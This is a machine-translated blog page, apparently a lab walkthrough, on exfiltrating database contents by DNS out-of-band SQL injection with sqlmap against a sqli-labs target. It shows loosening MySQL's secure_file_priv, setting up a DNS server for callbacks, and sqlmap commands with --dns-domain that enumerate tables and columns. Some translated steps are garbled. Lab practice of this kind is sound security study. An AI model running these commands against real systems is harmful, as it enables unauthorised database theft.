当前位置:网站首页>Reproduce dns out-band data combined with sqlmap
Reproduce dns out-band data combined with sqlmap
2022-08-10 06:33:00 【fish pass ruler zz】
Set mysql's secure_file_priv attribute
If secure_file_priv is empty, you can read the directory of the disk
If secure_file_priv is D:\, you can read the files in the D disk
If secure_file_priv is null, load_file cannot load files
Add a sentence secure_file_priv=“”
Configure dns server
1.Add role
2.Add positiveFind
3. New host
IP addressFor the ip address of the virtual machine where sqlmap is located
Create aPan analysis
Use virtual machine ping just set on the server, and enter tcpdump -n port 53 in kali; check the information returned.
4. Create conditional repeater
SQLMap uses out-of-band dns injection
Fetch library
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables
Get table
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables
Get Columns
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns
边栏推荐
- Elementary Structure
- 进制的前缀表示和后缀表示
- Tencent Cloud Song Xiang: Kubernetes cluster utilization improvement practice
- 2022河南萌新联赛第(五)场:信息工程大学 F - 分割草坪
- netlink IPC
- 什么是MQTT网关?与传统DTU有哪些区别?
- 2022 Henan Mengxin League (fifth) game: University of Information Engineering H - Xiao Ming drinking milk tea
- npm搭建私服,上传下载包
- Myunity框架笔记
- BUUCTF笔记(web)
猜你喜欢
裸辞—躺平—刷题—大厂(Android面试的几大技巧)
动态规划——从0-1背包问题到leetcode正则匹配
NetKeeper(创翼)开WIFI方法——2018.5
如何在VMlogin中设置YiLu代理?
[Network Security] Practice AWVS Range to reproduce CSRF vulnerability
Qt借助隐藏控件和QSS绘制重复元素
第11章 数据库的设计规范【2.索引及调优篇】【MySQL高级】
Unity2D动画生成操作(简单)
如何在AdsPower中设置YiLu代理?
MySQL 免安装版/解压版的安装与配置(Win & Unix & Linux)
随机推荐
XV6系统调用实现
QScroller的QScrollerProperties参数研究
vscode + ccls环境配置
Qt列表下方增加弹出加载数据提示效果
order by injection and limit injection, and wide byte injection
Qt中输入框在Win10上“Win+/“快捷键的一个Bug
All articles summary directory
Myunity框架笔记3
Unity资源热更新--资源管理、Addressable
Qt程序字体初始化引起的白屏问题
UnityShader入门精要-立方体纹理、反射、折射、菲涅尔反射
Quickly grasp game resources in one hour and remote hot update
MySQL 免安装版/解压版的安装与配置(Win & Unix & Linux)
腾讯云宋翔:Kubernetes集群利用率提升实践
Qt使用私有接口绘制窗口阴影
强化学习_11_Datawhale模仿学习
Ingress Controller performance test(1)
语法基础(判断语句)
几行代码就可以把系统高崩溃;
[网络安全]实操AWVS靶场复现CSRF漏洞